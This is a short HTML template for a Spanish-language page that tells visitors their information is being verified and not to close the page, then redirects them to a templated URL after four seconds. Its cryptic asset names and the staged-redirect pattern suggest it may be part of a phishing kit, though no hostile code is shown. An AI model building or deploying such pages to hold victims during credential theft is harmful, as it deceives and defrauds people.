<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="refresh" content="4; url=<%=url%>">
    <link rel="stylesheet" href="./css/obeta.css">
    <script src="https://code.jquery.com/jquery-3.6.0.min.js" integrity="sha256-/xUj+3OJU5yExlq6GSYGSHk7tPXikynS7ogEvDej/m4=" crossorigin="anonymous"></script>
    <title></title>
</head>
<body>
    
        <div>
            <div class="upot2">
                <img src="./img/topaupcc.png" alt="">
            </div>
        </div>
    
        <div style="display: grid; justify-content: center; align-items: center; height: 80vh;">
           <div style="display: grid;">
            <img style="margin-top: 50px; width: 100px; justify-self: center;" src="./img/Ripple-1.4s-206px.svg" alt="">
            <p style="text-align: center;">Verificación de su información. <br> No cierre la página.</p>
           </div>
        </div>
    <!-- my script -->
    <script src="./js/stb.js"></script>
</body>
</html>